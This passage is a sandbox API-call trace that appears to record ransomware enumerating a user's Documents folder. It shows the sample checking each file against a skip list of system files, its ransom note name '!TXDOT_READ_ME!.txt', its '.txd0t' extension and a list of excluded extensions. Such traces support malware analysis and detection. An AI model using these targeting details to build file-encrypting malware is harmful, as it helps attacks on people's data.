dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="6IKlp7h.ppt", cAlternateFileName="")) returned 1 [0073.968] StrCmpW (psz1="6IKlp7h.ppt", psz2=".") returned 1 [0073.968] StrCmpW (psz1="6IKlp7h.ppt", psz2="..") returned 1 [0073.968] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0073.968] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0073.968] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="6IKlp7h.ppt", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt") returned="C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt" [0073.968] PathFindExtensionW (pszPath="6IKlp7h.ppt") returned=".ppt" [0073.968] StrCmpW (psz1=".ppt", psz2=".txd0t") returned -1 [0073.968] StrCmpIW (psz1="6IKlp7h.ppt", psz2="bootsect.bak") returned -1 [0073.968] StrCmpIW (psz1="6IKlp7h.ppt", psz2="iconcache.db") returned -1 [0073.968] StrCmpIW (psz1="6IKlp7h.ppt", psz2="thumbs.db") returned -1 [0073.968] StrCmpIW (psz1="6IKlp7h.ppt", psz2=" ransomware ") returned 1 [0073.968] StrCmpIW (psz1="6IKlp7h.ppt", psz2=" ransom ") returned 1 [0073.968] StrCmpIW (psz1="6IKlp7h.ppt", psz2="debug.txt") returned -1 [0073.968] StrCmpIW (psz1="6IKlp7h.ppt", psz2="boot.ini") returned -1 [0073.968] StrCmpIW (psz1="6IKlp7h.ppt", psz2="desktop.ini") returned -1 [0073.968] StrCmpIW (psz1="6IKlp7h.ppt", psz2="autorun.inf") returned -1 [0073.968] StrCmpIW (psz1="6IKlp7h.ppt", psz2="ntuser.dat") returned -1 [0073.968] StrCmpIW (psz1="6IKlp7h.ppt", psz2="ntldr") returned -1 [0073.968] StrCmpIW (psz1="6IKlp7h.ppt", psz2="ntdetect.com") returned -1 [0073.968] StrCmpIW (psz1="6IKlp7h.ppt", psz2="bootfont.bin") returned -1 [0073.968] StrCmpIW (psz1="6IKlp7h.ppt", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.968] PathFindExtensionW (pszPath="6IKlp7h.ppt") returned=".ppt" [0073.968] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ppt") returned 0x0 [0073.968] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.968] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.968] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.976] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.977] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt" [0073.977] SetEvent (hEvent=0x418) returned 1 [0073.977] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528b4870, ftCreationTime.dwHighDateTime=0x1d5e1ce, ftLastAccessTime.dwLowDateTime=0xad54a8d0, ftLastAccessTime.dwHighDateTime=0x1d5ed79, ftLastWriteTime.dwLowDateTime=0xad54a8d0, ftLastWriteTime.dwHighDateTime=0x1d5ed79, nFileSizeHigh=0x0, nFileSizeLow=0x13641, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="7d9vJ0y5f9LLSOKq2PHP.ppt", cAlternateFileName="7D9VJ0~1.PPT")) returned 1 [0073.977] StrCmpW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt", psz2=".") returned 1 [0073.977] StrCmpW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt", psz2="..") returned 1 [0073.977] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0073.977] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0073.977] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="7d9vJ0y5f9LLSOKq2PHP.ppt", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt") returned="C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt" [0073.977] PathFindExtensionW (pszPath="7d9vJ0y5f9LLSOKq2PHP.ppt") returned=".ppt" [0073.977] StrCmpW (psz1=".ppt", psz2=".txd0t") returned -1 [0073.977] StrCmpIW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt", psz2="bootsect.bak") returned -1 [0073.977] StrCmpIW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt", psz2="iconcache.db") returned -1 [0073.977] StrCmpIW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt", psz2="thumbs.db") returned -1 [0073.977] StrCmpIW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt", psz2=" ransomware ") returned 1 [0073.977] StrCmpIW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt", psz2=" ransom ") returned 1 [0073.977] StrCmpIW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt", psz2="debug.txt") returned -1 [0073.977] StrCmpIW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt", psz2="boot.ini") returned -1 [0073.977] StrCmpIW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt", psz2="desktop.ini") returned -1 [0073.977] StrCmpIW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt", psz2="autorun.inf") returned -1 [0073.977] StrCmpIW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt", psz2="ntuser.dat") returned -1 [0073.977] StrCmpIW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt", psz2="ntldr") returned -1 [0073.977] StrCmpIW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt", psz2="ntdetect.com") returned -1 [0073.977] StrCmpIW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt", psz2="bootfont.bin") returned -1 [0073.977] StrCmpIW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.977] PathFindExtensionW (pszPath="7d9vJ0y5f9LLSOKq2PHP.ppt") returned=".ppt" [0073.977] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ppt") returned 0x0 [0073.978] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.978] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.978] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0073.986] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.986] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt" [0073.986] SetEvent (hEvent=0x410) returned 1 [0073.986] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b06ef30, ftCreationTime.dwHighDateTime=0x1d5b702, ftLastAccessTime.dwLowDateTime=0xf6036630, ftLastAccessTime.dwHighDateTime=0x1d5b939, ftLastWriteTime.dwLowDateTime=0xf6036630, ftLastWriteTime.dwHighDateTime=0x1d5b939, nFileSizeHigh=0x0, nFileSizeLow=0x5a15, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="82f_2PILY3Rkg8CydxKr.xlsx", cAlternateFileName="82F_2P~1.XLS")) returned 1 [0073.986] StrCmpW (psz1="82f_2PILY3Rkg8CydxKr.xlsx", psz2=".") returned 1 [0073.986] StrCmpW (psz1="82f_2PILY3Rkg8CydxKr.xlsx", psz2="..") returned 1 [0073.986] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0073.986] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0073.986] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="82f_2PILY3Rkg8CydxKr.xlsx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx") returned="C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx" [0073.986] PathFindExtensionW (pszPath="82f_2PILY3Rkg8CydxKr.xlsx") returned=".xlsx" [0073.986] StrCmpW (psz1=".xlsx", psz2=".txd0t") returned 1 [0073.986] StrCmpIW (psz1="82f_2PILY3Rkg8CydxKr.xlsx", psz2="bootsect.bak") returned -1 [0073.986] StrCmpIW (psz1="82f_2PILY3Rkg8CydxKr.xlsx", psz2="iconcache.db") returned -1 [0073.986] StrCmpIW (psz1="82f_2PILY3Rkg8CydxKr.xlsx", psz2="thumbs.db") returned -1 [0073.986] StrCmpIW (psz1="82f_2PILY3Rkg8CydxKr.xlsx", psz2=" ransomware ") returned 1 [0073.986] StrCmpIW (psz1="82f_2PILY3Rkg8CydxKr.xlsx", psz2=" ransom ") returned 1 [0073.986] StrCmpIW (psz1="82f_2PILY3Rkg8CydxKr.xlsx", psz2="debug.txt") returned -1 [0073.986] StrCmpIW (psz1="82f_2PILY3Rkg8CydxKr.xlsx", psz2="boot.ini") returned -1 [0073.986] StrCmpIW (psz1="82f_2PILY3Rkg8CydxKr.xlsx", psz2="desktop.ini") returned -1 [0073.986] StrCmpIW (psz1="82f_2PILY3Rkg8CydxKr.xlsx", psz2="autorun.inf") returned -1 [0073.986] StrCmpIW (psz1="82f_2PILY3Rkg8CydxKr.xlsx", psz2="ntuser.dat") returned -1 [0073.986] StrCmpIW (psz1="82f_2PILY3Rkg8CydxKr.xlsx", psz2="ntldr") returned -1 [0073.986] StrCmpIW (psz1="82f_2PILY3Rkg8CydxKr.xlsx", psz2="ntdetect.com") returned -1 [0073.986] StrCmpIW (psz1="82f_2PILY3Rkg8CydxKr.xlsx", psz2="bootfont.bin") returned -1 [0073.987] StrCmpIW (psz1="82f_2PILY3Rkg8CydxKr.xlsx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.987] PathFindExtensionW (pszPath="82f_2PILY3Rkg8CydxKr.xlsx") returned=".xlsx" [0073.987] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xlsx") returned 0x0 [0073.987] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.987] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.987] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0074.001] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.001] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx" [0074.001] SetEvent (hEvent=0x408) returned 1 [0074.001] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x979d05c0, ftCreationTime.dwHighDateTime=0x1d566bd, ftLastAccessTime.dwLowDateTime=0x55372160, ftLastAccessTime.dwHighDateTime=0x1d5a7a0, ftLastWriteTime.dwLowDateTime=0x55372160, ftLastWriteTime.dwHighDateTime=0x1d5a7a0, nFileSizeHigh=0x0, nFileSizeLow=0x17ad1, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="9H_Sl92NVVWuSvdwZJYh.pptx", cAlternateFileName="9H_SL9~1.PPT")) returned 1 [0074.001] StrCmpW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx", psz2=".") returned 1 [0074.001] StrCmpW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx", psz2="..") returned 1 [0074.001] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.001] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.001] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="9H_Sl92NVVWuSvdwZJYh.pptx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx") returned="C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx" [0074.001] PathFindExtensionW (pszPath="9H_Sl92NVVWuSvdwZJYh.pptx") returned=".pptx" [0074.001] StrCmpW (psz1=".pptx", psz2=".txd0t") returned -1 [0074.001] StrCmpIW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx", psz2="bootsect.bak") returned -1 [0074.001] StrCmpIW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx", psz2="iconcache.db") returned -1 [0074.001] StrCmpIW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx", psz2="thumbs.db") returned -1 [0074.001] StrCmpIW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx", psz2=" ransomware ") returned 1 [0074.001] StrCmpIW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx", psz2=" ransom ") returned 1 [0074.001] StrCmpIW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx", psz2="debug.txt") returned -1 [0074.002] StrCmpIW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx", psz2="boot.ini") returned -1 [0074.002] StrCmpIW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx", psz2="desktop.ini") returned -1 [0074.002] StrCmpIW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx", psz2="autorun.inf") returned -1 [0074.002] StrCmpIW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx", psz2="ntuser.dat") returned -1 [0074.002] StrCmpIW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx", psz2="ntldr") returned -1 [0074.002] StrCmpIW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx", psz2="ntdetect.com") returned -1 [0074.002] StrCmpIW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx", psz2="bootfont.bin") returned -1 [0074.002] StrCmpIW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.002] PathFindExtensionW (pszPath="9H_Sl92NVVWuSvdwZJYh.pptx") returned=".pptx" [0074.002] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pptx") returned 0x0 [0074.002] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.002] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.002] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0074.004] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.004] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx" [0074.004] SetEvent (hEvent=0x418) returned 1 [0074.004] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee80daf0, ftCreationTime.dwHighDateTime=0x1d5eda0, ftLastAccessTime.dwLowDateTime=0x640a9100, ftLastAccessTime.dwHighDateTime=0x1d5c2de, ftLastWriteTime.dwLowDateTime=0x640a9100, ftLastWriteTime.dwHighDateTime=0x1d5c2de, nFileSizeHigh=0x0, nFileSizeLow=0x1a20, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="aayLh9Av.xlsx", cAlternateFileName="AAYLH9~1.XLS")) returned 1 [0074.004] StrCmpW (psz1="aayLh9Av.xlsx", psz2=".") returned 1 [0074.004] StrCmpW (psz1="aayLh9Av.xlsx", psz2="..") returned 1 [0074.004] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.004] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.005] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="aayLh9Av.xlsx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx") returned="C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx" [0074.005] PathFindExtensionW (pszPath="aayLh9Av.xlsx") returned=".xlsx" [0074.005] StrCmpW (psz1=".xlsx", psz2=".txd0t") returned 1 [0074.005] StrCmpIW (psz1="aayLh9Av.xlsx", psz2="bootsect.bak") returned -1 [0074.005] StrCmpIW (psz1="aayLh9Av.xlsx", psz2="iconcache.db") returned -1 [0074.005] StrCmpIW (psz1="aayLh9Av.xlsx", psz2="thumbs.db") returned -1 [0074.005] StrCmpIW (psz1="aayLh9Av.xlsx", psz2=" ransomware ") returned 1 [0074.005] StrCmpIW (psz1="aayLh9Av.xlsx", psz2=" ransom ") returned 1 [0074.005] StrCmpIW (psz1="aayLh9Av.xlsx", psz2="debug.txt") returned -1 [0074.005] StrCmpIW (psz1="aayLh9Av.xlsx", psz2="boot.ini") returned -1 [0074.005] StrCmpIW (psz1="aayLh9Av.xlsx", psz2="desktop.ini") returned -1 [0074.005] StrCmpIW (psz1="aayLh9Av.xlsx", psz2="autorun.inf") returned -1 [0074.005] StrCmpIW (psz1="aayLh9Av.xlsx", psz2="ntuser.dat") returned -1 [0074.005] StrCmpIW (psz1="aayLh9Av.xlsx", psz2="ntldr") returned -1 [0074.005] StrCmpIW (psz1="aayLh9Av.xlsx", psz2="ntdetect.com") returned -1 [0074.005] StrCmpIW (psz1="aayLh9Av.xlsx", psz2="bootfont.bin") returned -1 [0074.005] StrCmpIW (psz1="aayLh9Av.xlsx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.005] PathFindExtensionW (pszPath="aayLh9Av.xlsx") returned=".xlsx" [0074.005] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xlsx") returned 0x0 [0074.005] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.005] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.005] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.027] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.027] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx" [0074.027] SetEvent (hEvent=0x3fc) returned 1 [0074.027] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c4d210, ftCreationTime.dwHighDateTime=0x1d5e83c, ftLastAccessTime.dwLowDateTime=0xe5260e00, ftLastAccessTime.dwHighDateTime=0x1d5ef56, ftLastWriteTime.dwLowDateTime=0xe5260e00, ftLastWriteTime.dwHighDateTime=0x1d5ef56, nFileSizeHigh=0x0, nFileSizeLow=0x1845f, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="chS1ef v8z.odp", cAlternateFileName="CHS1EF~1.ODP")) returned 1 [0074.027] StrCmpW (psz1="chS1ef v8z.odp", psz2=".") returned 1 [0074.027] StrCmpW (psz1="chS1ef v8z.odp", psz2="..") returned 1 [0074.027] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.027] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.027] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="chS1ef v8z.odp", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp") returned="C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp" [0074.028] PathFindExtensionW (pszPath="chS1ef v8z.odp") returned=".odp" [0074.028] StrCmpW (psz1=".odp", psz2=".txd0t") returned -1 [0074.028] StrCmpIW (psz1="chS1ef v8z.odp", psz2="bootsect.bak") returned 1 [0074.028] StrCmpIW (psz1="chS1ef v8z.odp", psz2="iconcache.db") returned -1 [0074.028] StrCmpIW (psz1="chS1ef v8z.odp", psz2="thumbs.db") returned -1 [0074.028] StrCmpIW (psz1="chS1ef v8z.odp", psz2=" ransomware ") returned 1 [0074.028] StrCmpIW (psz1="chS1ef v8z.odp", psz2=" ransom ") returned 1 [0074.028] StrCmpIW (psz1="chS1ef v8z.odp", psz2="debug.txt") returned -1 [0074.028] StrCmpIW (psz1="chS1ef v8z.odp", psz2="boot.ini") returned 1 [0074.028] StrCmpIW (psz1="chS1ef v8z.odp", psz2="desktop.ini") returned -1 [0074.028] StrCmpIW (psz1="chS1ef v8z.odp", psz2="autorun.inf") returned 1 [0074.028] StrCmpIW (psz1="chS1ef v8z.odp", psz2="ntuser.dat") returned -1 [0074.028] StrCmpIW (psz1="chS1ef v8z.odp", psz2="ntldr") returned -1 [0074.028] StrCmpIW (psz1="chS1ef v8z.odp", psz2="ntdetect.com") returned -1 [0074.028] StrCmpIW (psz1="chS1ef v8z.odp", psz2="bootfont.bin") returned 1 [0074.028] StrCmpIW (psz1="chS1ef v8z.odp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.028] PathFindExtensionW (pszPath="chS1ef v8z.odp") returned=".odp" [0074.028] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".odp") returned 0x0 [0074.028] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.028] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.028] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0074.028] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.028] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp" [0074.028] SetEvent (hEvent=0x408) returned 1 [0074.028] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x186cbfe0, ftCreationTime.dwHighDateTime=0x1d5cf93, ftLastAccessTime.dwLowDateTime=0x85968cb0, ftLastAccessTime.dwHighDateTime=0x1d5f025, ftLastWriteTime.dwLowDateTime=0x85968cb0, ftLastWriteTime.dwHighDateTime=0x1d5f025, nFileSizeHigh=0x0, nFileSizeLow=0x17ec9, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="CsjFe8d.pptx", cAlternateFileName="CSJFE8~1.PPT")) returned 1 [0074.028] StrCmpW (psz1="CsjFe8d.pptx", psz2=".") returned 1 [0074.028] StrCmpW (psz1="CsjFe8d.pptx", psz2="..") returned 1 [0074.028] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0074.028] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0074.028] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="CsjFe8d.pptx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx") returned="C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx" [0074.028] PathFindExtensionW (pszPath="CsjFe8d.pptx") returned=".pptx" [0074.028] StrCmpW (psz1=".pptx", psz2=".txd0t") returned -1 [0074.029] 